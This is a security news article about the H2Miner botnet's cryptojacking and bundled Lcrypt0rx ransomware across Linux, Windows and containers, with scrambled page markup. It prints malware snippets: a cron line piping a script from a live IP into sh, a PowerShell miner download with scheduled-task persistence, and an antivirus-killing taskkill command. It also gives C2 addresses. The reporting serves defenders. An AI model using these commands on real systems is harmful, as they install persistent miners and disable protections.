The H2Miner botnet, first observed in late 2019, has resurfaced with an expanded arsenal that blurs the line between cryptojacking and ransomware.<\/p>\n
The latest campaign leverages inexpensive virtual private servers (VPS) and a grab-bag of commodity malware to compromise Linux hosts, Windows workstations, and container workloads simultaneously.<\/p>\n
By chaining cloud-aware shell scripts, cross-compiled binaries, and living-off-the-land commands, the operators pivot quickly from initial foothold to Monero mining\u2014often before defenders notice the spike in CPU load.<\/p>\n
Attacks begin with opportunistic exploitation of misconfigured services or vulnerable applications such as Apache ActiveMQ (CVE-2023-46604) and Log4Shell.<\/p>\n
Once inside, the botnet deploys tailored loader scripts\u2014\u200bce.sh on Linux and 1.ps1 on Windows\u2014\u200bthat terminate competing miners, disable endpoint protection, and fetch the XMRig binary from 78.153.140.66. Containers are not spared: spr.sh scans Docker images and ejects Alibaba Cloud\u2019s aegis agent before dropping Kinsing.<\/p>\n
The same infrastructure hosts a Cobalt Strike team server at 47.97.113.36 and Bitbucket repositories that disguise payloads as \u201cMicrosoftSoftware.exe,\u201d illustrating a mature, multi-tier command-and-control (C2) design.<\/p>\n
Fortinet analysts noted<\/a> that a new VBScript ransomware, Lcrypt0rx, is now bundled alongside the miners.<\/p>\n Although its encryption routine is rudimentary\u2014\u200ban 8,192-character XOR key stitched to a per-file salt, \u200bthe script still overwrites the Master Boot Record and litters the system with decoy persistence<\/a> hooks.<\/p>\n The overlap of wallets and hosting addresses suggests either collaboration with, or direct control by, H2Miner\u2019s original crew.<\/p>\n This shows that how ce.sh implants a cron job that re-downloads itself every ten minutes:-<\/p>\n Besides this, it highlights the Windows counterpart, where 1.ps1 registers XMRig as a scheduled task:<\/p>\n H2Miner\u2019s sticking power stems from its layered infection sequence. The initial shell scripts<\/a> enumerate defensive processes, kill them with brutal regular expressions, and wipe audit trails by clearing shell history.<\/p>\n On Windows, Lcrypt0rx escalates via While that registry logic fails, the malware compensates by embedding six auxiliary scripts\u2014\u200bfrom Each helper is dropped with This belt-and-suspenders approach, coupled with frequent updater scripts like cpr.sh, lets the botnet respawn miners even after a partial eviction.<\/p>\n For defenders, that means endpoint remediation must include container images, scheduled tasks, cron entries, and rogue registry keys; otherwise, the Monero<\/a> wallets\u2014\u200bnotably 4ASk4RhU\u2026p8SahC\u2014\u200bwill continue siphoning stolen compute cycles long after the first alert is closed.<\/p>\n Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams ->\u00a0Try ANY.RUN Now<\/a><\/strong><\/p>\n The post H2Miner Attacking Linux, Windows, and Containers to Mine Monero<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEie2tjWT2TjU4nOiYi9HNvgb3FhBrYt8jZ3ErtcOP4L7Pb7kOLGjxE2Dfd4uf1w8gAZ-1gt9zjUfCO0sS_NCbynmtUlzx6GFiVXiUCbQ5j17xZcRfONlOkyofXI0Rbz05S1bkjuGVep_sMv7JN8Uhh_tUYLIeYYqC7roniRJxsgjAcoxiLU7X1F9VuIAn0\/s16000\/Encryption%2520logic%2520and%2520XOR%2520implementation%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtGVnv3KsLEYFFk03wPrSUvSyZTUpT0yiEt8rsQnxVaV5hvK0GkwF9M_sHuaHqthcY_JREcEhBLiDmYySLTsrWsmsEQf6dGztgp6YYhdXnZnvVxqZmEJ9g_iwbEdX6pT70gNrX5MT3KrW-3U8_Dp4h-5GhriwIV8hFn2_2ExIjNyp6-dOIbYZZ5CfVHi4\/s16000\/Attribute%2520manipulation%2520and%2520MBR%2520overwrite%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilJupkn7i2VvMw65uED0nDXPs3c2q4-RIZkjT1YLbE9ijXWVfbSnBtZ-bO7M8RO8snHwwwsHj8T4-_aFI5xMdctlfPT8I_EsfIA42I93A24L8dvGmhDscvS2jRxtdf-aRcYPVYQT47GcBuVwhdmoz-eN_XEWn9qwlgOv1uX6XRaXjpQFabl1zNGy0y-IM\/s16000\/Cron%2520entry%2520and%2520clearing%2520command%2520history%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\"){kind=spacer}
( crontab -l 2>\/dev\/null ; \n echo \"*\/10 * * * * curl -fsSL http:\/\/80.64.16.241\/ce.sh | sh\" ) | crontab -<\/code><\/pre>\n$miner = \"$env:TEMPsysupdate.exe\"\nInvoke-WebRequest -Uri \"http:\/\/78.153.140.66\/xmrig.exe\" -OutFile $miner\nschtasks \/create \/f \/tn \"Update service for Windows Service\" `\n \/tr \"$miner\" \/sc minute \/mo 15 \/rl highest<\/code><\/pre>\nInfection Mechanism and Persistence<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgJIdbYZBRnTCDfI3euu_CggzC5FUJHjIaoIP7g2AOjk06SyfFheulXSQEjePpLSUd4sMUtVQT4GK923aPbf_dFvGVmHaiXfb02erV1iNKC67VS0MTGn6IGJ39DQ7MSN6SEwTLaHrJG7cOCImbVgXqt5pzCAZwXj6FXOyQyB0slJMv1SnHKfGv6onCAK2I\/s16000\/Wallpaper%2520defacement%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")
Shell.Application<\/code> to relaunch itself with wscript.exe \/elevated<\/code>, then attempts to cement persistence by mis-writing its path into the Winlogon Shell and IFEO keys.<\/p>\nadvapi32_ext.vbs<\/code>, which loops through taskkill \/f \/im *av*.exe<\/code>, to USB_bridge.vbs<\/code>, a rudimentary autorun propagator.<\/p>\n+h +s +r<\/code> attributes and invoked under HKCUSoftwareMicrosoftWindowsCurrentVersionRun<\/code>, ensuring at least one copy survives cleanup.<\/p>\n